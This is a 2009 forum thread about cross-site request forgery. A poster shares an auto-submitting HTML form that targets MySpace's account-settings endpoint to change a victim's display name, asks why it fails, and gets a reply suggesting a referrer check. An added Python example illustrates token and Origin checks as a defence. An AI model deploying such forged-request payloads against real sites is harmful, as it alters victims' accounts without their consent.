Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Myspace .. maybe..CSRF on it??
Posted by: XaDoS
Date: August 28, 2009 11:40AM

Hello guys!
I discovered one day ago with my friend 3 CSRF on netlog and now I will look at myspace.. it's difficult, I know, because there are some captchas, tokens and other protections but..
I want to ask you why it's impossible to change the user_name of the victim??
I tried with an easy HTML code as a test, but it doesn't work.. and I want to know the reason for it.

my_poc:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>change_username_of_myspace_victim_user</title>
</head>
<body>
<form name="XaDoS" action="http://profileedit.myspace.com/index.cfm?fuseaction=accountSettings.contactInfo" method="post">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$DisplayName" value="[NICKNAME]" maxlength="50" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_DisplayName" type="text">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$FirstName" value="[NAME]" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_FirstName" type="text">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation" value="Salva modifiche" onclick='if(!Page_ClientValidate()) return showErrorMessage();WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation", "", true, "", "", false, false))' id="ctl00_ctl00_cpMain_cpMain_ContactInfo_btnSaveLocation" type="submit">
</td>
</form>
<script>document.XaDoS.submit()</script>
</body>
</html>

Legend:

[NICKNAME] = the nickname for the victim user;
[NAME] = the name for the victim user;

So.. where are the problems??
thanks a lot in advance for your time

XaDoS

Re: Myspace .. maybe..CSRF on it??
Posted by: PaPPy
Date: August 28, 2009 02:41PM

maybe they check the page referral?
try capturing the data that is used when you legitimately change your name on myspace and analyze it

http://www.xssed.com/archive/author=PaPPy/
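
The two protections raised in this thread (the token XaDoS mentions and the page-referral check PaPPy suggests), shown as an added server-side example that is not from either poster and not MySpace's code. The host name, key, session id and the `csrf_token` field name are assumptions made for the illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values for illustration; not taken from any real site.
SERVER_KEY = b"constructed-demo-key"
TRUSTED_HOSTS = {"profileedit.example.test"}


def issue_token(session_id):
    """Per-session token the server embeds as a hidden field in its own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_post(session_id, headers, form):
    """Return (allowed, reason) for a state-changing POST."""
    # 1. Source check: exact host match on Origin, falling back to Referer.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"  # strict policy (assumption)
    if urlsplit(source).hostname not in TRUSTED_HOSTS:
        return False, "cross-site source"
    # 2. Token check: a page on another origin cannot read the hidden field,
    #    so a form that only copies the visible inputs arrives without it.
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, issue_token(session_id).encode()):
        return False, "bad or missing token"
    return True, "ok"


def demo():
    """Run three constructed requests through the check."""
    sid = "session-1234"  # constructed session identifier
    name = {"DisplayName": "new-name"}
    forged = ({"Referer": "http://other.example.test/page.html"}, dict(name))
    lookalike = ({"Origin": "http://profileedit.example.test.other.test"}, dict(name))
    legit = ({"Origin": "http://profileedit.example.test"},
             dict(name, csrf_token=issue_token(sid)))
    return [check_post(sid, h, f) for h, f in (forged, lookalike, legit)]


if __name__ == "__main__":
    for allowed, reason in demo():
        print(allowed, reason)
```

The host comparison is an exact match on the parsed hostname, so a look-alike host that merely starts with the trusted name is still rejected.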
